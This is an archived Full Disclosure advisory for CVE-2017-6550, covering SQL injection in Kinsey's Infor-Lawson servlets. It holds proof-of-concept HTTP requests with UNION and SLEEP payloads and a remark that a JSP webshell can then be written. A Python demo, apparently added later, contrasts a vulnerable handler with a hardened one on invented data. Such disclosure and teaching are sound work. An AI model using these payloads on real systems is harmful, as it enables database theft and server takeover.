lists.openwall.net
Open Source and information security mailing list archives
Message-ID: <iEMjbT2mtj-iVVGVtUVVZ7x51e0RNVGxdm0DQ1ReKziw26eeaTRncZz9LuPKfElQv6daj4EiAFPt_pq802Aj2-UnTBjW2D0lOJGAlzya3K0=@protonmail.com>
Date: Fri, 10 Mar 2017 10:40:07 -0500
From: Michael Benich <benichmt1@...tonmail.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CVE-2017-6550: Kinsey Infor-Lawson - Multiple SQL Injections

Summary: Kinsey's Infor-Lawson application (formerly ESBUS) is vulnerable to SQL injection in at least two parameters:
------------------------------------------------------------------------
Vendor: Kinsey
------------------------------------------------------------------------
Software Link: http://www.kinsey.com/infor-lawson.html
------------------------------------------------------------------------
Identifier: CVE-2017-6550
------------------------------------------------------------------------
Tested on: Windows Server 2008 R2; MySQL ver 5.5
------------------------------------------------------------------------
Exploit Author: Michael Benich
Contact: benichmt1 [at] protonmail.com or @benichmt1
------------------------------------------------------------------------
PoC:

1) TABLE parameter, PoC below

GET /esbus/servlet/GetSQLData?SCHEMA=ESBUS_INTERNAL&TABLE=SCHEDULEDTASKS UNION ALL SELECT <<ATTACKER INPUT>>&FIELD=LASTRUN&NOHEADER=1&SELECT=CLASS=com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask&OUT=XML HTTP/1.1
------------------------------------------------------------------------
2) Query POST parameter

POST /KK_LS9ReportingPortal/GetData?SERVERID=%27;LSF_PROD& HTTP/1.1
<--snip--http headers-->

QUERY=1 AND SLEEP(5) AND ('foo'='foo')) &OUT=TAB
------------------------------------------------------------------------
A JSP webshell can then be written to the /esbus/ directory.
------------------------------------------------------------------------
Timeline:
12/1/2016 - Discovery. Contacted generic security emails
12/1/2016 - Received response from vendor ("Thanks for the info...")
2/27/2017 - Followed up with contact and intent to disclose. No reply.
3/10/2017 - Disclosure
------------------------------------------------------------------------

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
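The two injection positions in the advisory, as an added example that is not part of the original post and not Kinsey's code: a small Python model of a GetSQLData-style handler that assembles `SELECT <FIELD> FROM <TABLE> WHERE ...` from request parameters, in its vulnerable form (plain string concatenation, so the TABLE value can carry a `UNION ALL SELECT` as in PoC 1 and the filter value can break out of its quotes as in PoC 2) beside a hardened form (identifier allow-list plus a bound parameter). The statement shape, the sqlite3 backing store, the second table and all rows are assumptions made for the demo; table and column names are borrowed from the PoC URL. SQLite has no `SLEEP()`, so the time-based payload of PoC 2 is stood in for by a boolean tautology in the same injection position.

```python
import sqlite3

# Constructed sample data for the demo. Table and column names follow the
# advisory's PoC URL (SCHEDULEDTASKS, LASTRUN, CLASS); the rows and the
# 'users' table are invented so the UNION has something to read.
SCHEMA_SQL = """
CREATE TABLE scheduledtasks (class TEXT, lastrun TEXT);
INSERT INTO scheduledtasks VALUES
  ('com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask', '2017-03-01'),
  ('com.esbus.appliance.OtherTask', '2017-02-28');
CREATE TABLE users (username TEXT, password_hash TEXT);
INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""


def connect():
    """Fresh in-memory database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA_SQL)
    return conn


def vulnerable_get_sql_data(conn, table, field, where_value):
    """Assumed shape of the vulnerable handler: every request parameter is
    pasted into the statement text, identifiers and filter value alike."""
    sql = f"SELECT {field} FROM {table} WHERE class = '{where_value}'"
    return [row[0] for row in conn.execute(sql)]


# Hardened form: identifiers are never copied from the request. The request
# may only choose among known names, and the filter value travels as a bound
# parameter, so neither can alter the statement's structure.
ALLOWED_FIELDS = {"scheduledtasks": {"class", "lastrun"}}


def hardened_get_sql_data(conn, table, field, where_value):
    table, field = table.lower(), field.lower()
    if table not in ALLOWED_FIELDS or field not in ALLOWED_FIELDS[table]:
        raise ValueError(f"unknown table/field: {table!r}.{field!r}")
    sql = f'SELECT "{field}" FROM "{table}" WHERE class = ?'
    return [row[0] for row in conn.execute(sql, (where_value,))]


# PoC 1 position: the TABLE identifier carries a UNION of another table and a
# trailing comment swallows the rest of the statement.
UNION_PAYLOAD = "SCHEDULEDTASKS UNION ALL SELECT password_hash FROM users --"
# PoC 2 position: the value closes the quoted literal and appends a condition
# (stand-in for "1 AND SLEEP(5) AND ('foo'='foo')", since SQLite lacks SLEEP).
TAUTOLOGY_PAYLOAD = "x' OR '1'='1"
LEGIT_CLASS = "com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask"


def run_demo():
    """Send the same requests to both handlers; returns a dict of outcomes."""
    conn = connect()
    out = {}
    out["vuln_legit"] = vulnerable_get_sql_data(conn, "SCHEDULEDTASKS", "LASTRUN", LEGIT_CLASS)
    out["vuln_union"] = vulnerable_get_sql_data(conn, UNION_PAYLOAD, "LASTRUN", LEGIT_CLASS)
    out["vuln_tautology"] = vulnerable_get_sql_data(conn, "SCHEDULEDTASKS", "LASTRUN", TAUTOLOGY_PAYLOAD)
    out["hard_legit"] = hardened_get_sql_data(conn, "SCHEDULEDTASKS", "LASTRUN", LEGIT_CLASS)
    try:
        hardened_get_sql_data(conn, UNION_PAYLOAD, "LASTRUN", LEGIT_CLASS)
        out["hard_union"] = "accepted"
    except ValueError:
        out["hard_union"] = "rejected"
    # The tautology is compared as an ordinary string and matches no row.
    out["hard_tautology"] = hardened_get_sql_data(conn, "SCHEDULEDTASKS", "LASTRUN", TAUTOLOGY_PAYLOAD)
    return out


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name:15} {result}")
```

Running it shows the vulnerable handler returning the invented password hash alongside the real LASTRUN values for the UNION request and every row for the tautology, while the hardened handler refuses the UNION (the identifier is not on the allow-list) and returns nothing for the tautology. Note that binding alone would not have fixed PoC 1: a table name cannot be a bound parameter, which is why the allow-list is needed in addition to the placeholder.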